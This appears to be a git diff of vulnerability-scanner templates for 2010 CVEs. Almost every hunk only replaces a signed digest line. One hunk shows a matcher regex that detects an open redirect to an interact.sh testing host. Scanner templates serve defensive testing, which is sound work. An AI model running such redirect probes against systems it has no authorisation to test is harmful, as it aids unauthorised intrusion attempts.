490a0046304402207d2b76ba25d0ad5381081e768913584864df406b1696c5a1dccdc78935fe522e022071d833c253d8de0bf3cfb428eee24647e3a90c7ebf3196effd2e3420137c092f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 4e6aca9a3f..a26eca7e8e 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b57708e6b86599b708a873726d3263ce9e0d49d0e76391bb6e037a1e4937404e02205933cbacd47892558c18c7db7b4e88a0b4baec456d1c7c5491d0e2c9866f4c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022000b6899c913c5bd0ceb42c14d108c1741580398b39f428de55ccd09b4ba1b4b9022100b7aeea7d03ee99c7a0600a8f1cd24ff781d211dacbc4344f8e9ea312313d6ca5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index f9d0e38eab..d0f755fd6c 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f77cc9390bd803fbca8187a83cb02da04f9ae3266fa39411d74246715d73b3c2022100842daa59cdd4ccbdc54569b1ba9d26c9345d05417ed8dc1b26c60448429663d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b58095f6e4024a28fce43842422018af902ac5051d7cc6bc00ad7476667005e6022100bd0c9cd769fee3af1e267e443a12d7e7be77aa34cb6bb16ea054a601b81cf7d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 7c9a7eb7a6..889bd45ed3 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7b04454a6bb69f264e4dd4754eee56b3022c4c5ac84e46575de2bb39dcd4a51022100956719ea0bbde43fd2079b3d401d9f87038ff2daa9c9f264755da2c0fc2a9aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207182f747ac32a6bfe878295a26517623ca07c35dd76037fc47a532e2cd4b7f19022100dec3f2b427bfd915d76d332f51345ec7adf9fd72348077c7d2e73b63ab3c503d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index f7dd410913..9f31ea1036 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e1f4f0060c68c73b81b05fa0c036c433de7e7de661c13e245b6519b209dd0686022100f724f0853fa864ea201f7b3377b3a7ae4bafc82fb0db4544f09b7092d505e11c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a7a993d9d79ed0e9428f8e7a27c4eaa8bb50699ce4b5f229a82470bebd11c5d02200b756742505f4b6612893c93ec01ef657e11ccb858925f5557acba3508857320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 3834db0a3d..7c9580f95e 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204ea305e21cf6b002e44afd364c3d21030b96316a544c492604ec10f5ff96ecac022100cca452f129982dde163f273a63e54d06d5e6496eef9837cb8c2de19cbe2f74cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a3fcd496600b1fa6e6b32bc1c039d3f70389e03186d0b8a2e5a46d308a3b13c02200f90e118c944ad986fe115f276a68ec951e1f840060aa1fba129cf92227f6443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 416ecbaa37..83d7a7e76b 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022064827a2b3a8d58ef4a2a3c46803548cec0052632c4c7f8d21f18118ebd14b3c6022058eb78319f044f69ba50ef4e0d899e39e70636966010a842185bd8f281387cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100876fb86c79af734429fbc9bdfb62d32fd323913fbc5ae9c33893faab219ae3c602206ca924646a6b9f04d4dec02f0bb07862085ebdff0d46abfad8b2240c0393e6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index acadc8b7c7..4d4b63036b 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100867fd351a2a90244ed77e8046adc2180f92604b75e069d398751668b18310e9802202d41ba7430bbc6e96d855278855e1aefd1286ec09c836f3de9de918bde460e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dec3c8e74c89d1c2137252877103f087c24ab5b0032e29706f26a7aa2d505b51022100812504196f464fc3c243b0fed4e42e83af232d79c201b35975362817c8f8dfcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index be587a7a64..d274284b73 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022069608b00d6cce302d41960d97e53dffd2328158a421962cdc5d326a3c65c13d60220253869fcf736190901161cb37df82fd67626fa6b943ac18ade19c1ade10bcba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2ee5113ea7ef6e40728910e3d42e905985b5b2f7ce07d14947241170a9a1dc9022029c4419ef7ee627daa6f2d32119c452f396ae07a75d68bf757f8b36f3d72279e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index c424f0dabc..43c9ae340c 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ab74f27464637000a111771ceabe7ebf60c232bbce13a6e98a322da6de8bee8022004e7174b83c84a10ed6ef3361845038a32769c167a8c9af5e13cf68801097e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010350a849593d03ba234d2902090dfadca9db966181dea39d40f1c08364fd15202205216f256dda57cd3242faafcb58314dd7c7067d905dadb9fc0605aff7d8c37e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index a58b8ab704..2747a0d63d 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc7c7d05af07a16c8189bdfeedfdefc06822cfb29f3b88ef920758007b104b2702200f9367dbbdc9cff4443413464334b1c74617dc88858f43e18aa91c25673c5203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b92a27cffd675f1c89a3dc3e259e02b18bbe0ff2e7cd9787bb5d854df856f03b022100add5340c3c01697019aea1c76881d865dd47f08d25693a0c2093852745f5a4ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 23ebbe1a46..43d20dd1a8 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008fe8611cd1efc4f804b1ee87a4214c6c9b21fc126850ea0f1f125c3338f0ed18022100b42e613cc4df538c18194ca7642095e0466c2d796db442442718dadcae08c21c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2df4858cbaf547127688eff5b5171252e5ca7e62b326e5775520eed0fcd98e60220069c41d4322c3b26dc53d92feff024c37911bb8f20cb54d1d1cf309f99afe865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index e63459402e..d6bbf61fe9 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df0e15dc8ad751dfc509ae1b4143e07b3fb4ed6a605f8ade6971a5802196c61e022100e1d144cc199d7989faa57edff4c8b453911e79d83078f283231bc8863acab853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efe9c0e88f1a437920a254a9af98090e61cb3a31066117ffedd5ed530f7d6d8002200b7bbddd9c44eeeaed3f7a0661c2584fd02eff1ee72407ab69438e5a624539c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 7eb233afcf..0a157487ea 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220499958bd8b65329c91db733607eda67f42e998529c2f50d7bd31533e2f16099f0221009a946f09a949fae53df09425fbda4d4ed20e2bbe6efff9498d618febbfa13ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220059fc9b5d99d0d9636137e465805abe09edfea773c219ee0dd6d87a2605f9a300220287a6169b7fba68798660e2b0e0188fc71bc828617d12932f2e6190c33ebd60a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index d261375c8c..47f69a66bd 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a72b93687ae905cb435bd660f819c05235fbbba93843921d66c92829f89326e5022100fa0275f518da4c827f358b9e50a65d64a79c88d9575fb5c2345c113944b2b673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207184322c628890c7de0c4e3b9e9a2a38517f6dddb9757aa44683b05c5518d787022071d178ca46976c0d4eae94a264e03b9a248fffca2f1a4483533b61c79e3ee4e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 9f0a81024d..ba2405fae3 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5d1dc1258511f9a3bbcbb0f0046814c02884c77cd78b0aeb5347a539fd1704202210092074be1dceaa45c5bec4c8cdebe96901e5956aeff8bb2296f16b5e79131c0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100caa8ab1e28dfea7cb453ec6d5dbe64be34f6d7cc32536dd3ec44a235c7e4ae2f022100fe615191b31cfb66a9aab3764b60b6e8f48399f4db6e47dc11ca2a5eeaba8193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index f64d5e7985..c3ce3efc51 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eeb17d0a55fe9c292ed360d93e7dc16c7902595cadb704b45bded9319b572a7b022025cecd4333e92104c46103332061db86c2f1fb967473f61b7cd1f0f37afdc41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e26a8ff4085b67940c0ef1fc18c494fd19838e9b47b402ac6e04516b8a42128022100a7c154b7c134259adb28eff060f97bb18d70796fcc32e300a6dc35dafdf8dd79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 4e3b60db86..7cbc8e5249 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096d617b9e4bee8999116e4486ab5679a0f8a0e2c3499f80dfbd7e82d29148637022052f87a0ce7cd16e33e9ff539425d1f7229f81901d825193e4586e89a021a2f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a92c230e02820f5272be13d2ee12a3e2739ac81ac8868dfbbe2ff407522df0c0220517ba0c636efa561e00528f86bcb0cdb861bc0e5382c72f4cb8f11b5fffc3b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index c4a29e5e43..bd5bc84bdc 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207a230c9a42e5a5c8bb0d395087e0aca9cefd7285a167fa42c9a5a93b14c46d88022100e8550828a91b082e4c908b27285a1ef13d48a2f7580ec020f4ab09aecec205e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015a1aa2cf5ae67be65f0e04b4cbe2d237956ddbd917e7f1edeea5cf55ac6db8f0221009f8beb3570a312fe657536961f2816c765169e62d4f8e5125c3fc17bff3eb08c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index b75444e08e..0dde461d3f 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210090ded558efdc68efdfc4f1021042fe040fd9623e489a797a51ae65dca54add4d022036194cfa1b5329324aac1be6674cbcd60f3f2f02ce8109881a3575f46e7f4929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9af2e28d5bc394618211dcc8b2f192a7ce42c2e35b08786d18ab20827349b7e022100dbb9adeb2d45fb05ef895d2a21b3ee08f8015a05332c60dcb83731a53442e209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index bf23d912a0..5ed70ee71b 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207abe352a0287053462859d617d5bd1fad54ddcac4ece82145ff93edb42ea650d0220645a86c6f1c30a29acafb429ee6448d393085220af5a5749ff0c71b29114a1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7cecf07d6990bce885635ddc603ed5e392f9c45b33c9ee2ecefbbbd90bcd91e022100fc75e5ee2844d86e3d50f89ee82368bf035a44afae80654e6161e1e9988031d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 495c830e4f..39f12d0004 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a968e604f3d5eb04a9d0d2b89e3a82a0abfaf1175bdac3d8cc895972c44b442b02201c5bbbefc7883b0bc96f5ffc6096d834707dcc79a31426f6d0a8f90c0c5394d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f28d01f57161a02bf0727760cedef9d94c2eae06175f5cff2722ac42891705502210092b555b66eb7a1abf30dfb9b43ddea7d298e3a94a34fc2f2610b3a9a70e6a70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 98c98d26e1..c1a0c9d643 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202e2f5d6ac3b345ee3cfa7384339109d6498d73396a041237ba62f85526c5755b022100a131f30562e84b03ddfb91b97024de09c91c88583778ffeeeb1feb0787c279c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201dd2af6c72c0c50656cff558b9859758ecebf080e395edc246722f917fb27737022031f63a24fc701490ae695707c50af24beff441d65cff753f5cc836234ab5f63d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 33c9b6b099..c011a199e4 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fac14474eded012145b6cc5d2952b23724d33d7a6533cb251a4ff33a6a7403e022046a06cd61e75005c10d20e74a8989cb3b5b7b7279333ef5743ec00241aa04eef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1c844087d9f99b800d41c8a4acaa975b73c22081500a6a2dd499b3d2d3d71480221009373f4f4a18bc31c58b40d333641074ac6e32896926109d8433d88a00df42e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index ef58fac757..3c99b10f6b 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205121f2e892c037b7ac973a0080003faa18a9c705a9a025279a23a5942b4a362902204df0392cc98a96774f98772e99e110f26e6e3a2afc572f453bffd4305d0d6e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a59795cfe04ec504a70d992355e566696421a8728c518f44f980195ed1ebc87e022100a8e30102fb41d579913b2b6d8c8d4ce6e69d7f92cb049cbadb37316e0a6abe5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 8e982c8d2b..a3a3629260 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d5417a03479c8004cc8a34cbb7abdbe70cdd7a851a528792d72560c471d52e8e022013f0d023748d6b1e1c3bf7582cc10d8f230a60aa0f03d58a4cb5ace89cccbc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220308d3154b20cd13add22dd11052b693ea11b1c145a7f68096c356dffbc3019c9022100fe98683c31b125fff17c3349cc916cd76ba28143585e3d6b8b39a1d1df520350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 61bdd874c1..f00f2c13f6 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008141ca5c007f7e8cef45d147c64118c92755dbe18bad5efacb93ba4bee5f784102205acdbd62f9d1e6b512ddc3f4ce80f249330376fad2ddac92fd2968cbf1090103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7be03e2da75a940e25fafaf1a4d50722806d4625deb4e5d9d07b1cb481687fa02207d8bc856496e4ee34f550ce36f546460f4e8735cf66c26b7a165045bd4fdf706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index ba43ae0d1f..41e56dfb19 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d829381add883dd1d5af538546bab9cfd00e470a806b5543ae8731c1621a8395022100f8dc253e35b6cc1342ee3b3a5e3f8292439de7542ef702b51140cc83fcf147df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f7df725ec0ceb5ceee131b038bc968970d2d88b384e9aef0264f86c4e1a9cfc022100cdbce08db72e7d0daaf958a952f417186f7521e57d4aac515bea502a90d2a7ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index f811dd7200..863efab27c 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ba34cfc30e2696d2f60567dfda7a22293776c64a3fec9689f2b5d44e69b7da5022055c4c0938d9a9cee5e650c746792770cdfe8bdbb9584093dc0247acb1cafa355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081dbbc9fef4581be162a3e3bb236772ee342124519b6b9c154e90cf4d3e01c3d022100d6ed65922a8a9c360bf80c86a5325f65867580d65bbabb4d65a1a07077fdd0f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 2da0c2f532..9194173a53 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bc942e036cac7325edc601114a5bed76a616e7848e29f355f99aaa6b41d2526022100d8473b1793386d25bc4d72b6be8233568b651c311b9c109a28847ed26c4c8b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220574c6da37639a76ba15bc5c067f82ef1cacc5469ce283e5669e9f021e251aca102204aa31c43e1eb2733eeb85d398d1cc5cea7ff0b10e802ccf968f959cf735b52f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 8cf06ac17f..30a12f4498 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204de369cdcd5642bfba5117d8bd6d580d376907887b0db877e5010bf9b7af696d022100fc299cf2a0b7049e80bc3b6c69471724da1be4f2f738b50df7815291c0cddb3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cbe990fbeafdea03ed9b0a242e32060813fcb200d01f879c6c66bb6851fad3fc022100d6706011eafb40cf452c5da19cd739dec4ec70b0de7a3509b191b9d87c975ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 5e346d56a0..d701535cdf 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d219bfb3f6cbf16b9e8fc5c98b899808a4e51dd967f238011fb2e021fdefe55c022100e6c92c27a313dfb2117711d107cfad86965ec2e46b2f68abcbf96a58ce448d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a41e186494cff0411569ac94cbed846bfd365971d32ff593c0b4cb9fbeb863402207e8dc37b800a70db2c107e7273a86040ce60d4832674571a6f0bf26fcb7f5aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index d66a1f0620..fed46bb8d2 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e6531faa16beb682aa96eb4b61b502041d816dd7bb5d4e27ff102cc19c33553f022100bc65f33d23e213b2505cbe37ad46be4dfdd435ac7e764407cebe193a08f4c271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f78cfca3d2b6e107ba9fee210b05c7c52f5b2c2ecf3fcebb9f91a4fb02035e8c022100f8e98568ccc983bd2288a58477421cf1f61769a68ac2b94c9401720210ae0de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 47849bd9cf..d045015a6e 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092b4cd176b84b1cec147b3af6069f4a72db87e970db3a5159343589ff42bbbdd022100e1e1203f0a25c2ef5b158c18a188524a61440fab1a3046baad2e52374ad7293e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202184d99f34f813466ca7acdc9097321802622cb1f2a1db797799635533c16a5f02207f6cd28a658ff4fabc82c6062271a21075a7837714425abf708ba11ac7704b18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index dc0a05e8c6..78dfb2c3c1 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a1ca762268be18b1225d800ffa6847afa432024b0724f1e85f24f18b2ec1ce3022100c5bfbeeb89ead13f3b2b34b0557f86727df26bf3f33464c6d7fdfd28bc78d612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9a877bb3bfe40355d475efa6f4262437566ed18f0fa4e1f6161694092ed9113022039c26d75637e709380f68ecad14ea430e30a313083f04914366221c9ed2518f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 99962512d2..e9ce88749e 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a9a56652a6b615e6dd15e8aaee28b3bc822f7a818542029ef8ba83c2df7ea1702204c46b96e486e65d2ab0bc8669738b56d4226444fb04cecc26803e7d17489c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4c41a1a1446170b0ddfb1e26117dfa21e822cd0ca049e776946ce8e889103bd022100b6850d5ed34270401f8fbd44fc2ea07e2acfe0f6200180c550eb7352bcfef9fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index b311595385..e9c3e2cc65 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022036ec89a20bfbd44d98ab6a1a972b575521992faef4f4fcded33a447ae95f003d022100a4a2c52f0bb6af88942a06e56af358752329728b51ceff63c8f00fbdbdd900a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f57a607443ab3d3afbecb32664f1d6143de739eaf0a9af290671f808ee175f33022100f241d17fa92db4be2755072bfe591fc4fe9d6dc10f24f02fecf152f383bc496f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index b20b8086d6..651c40b247 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 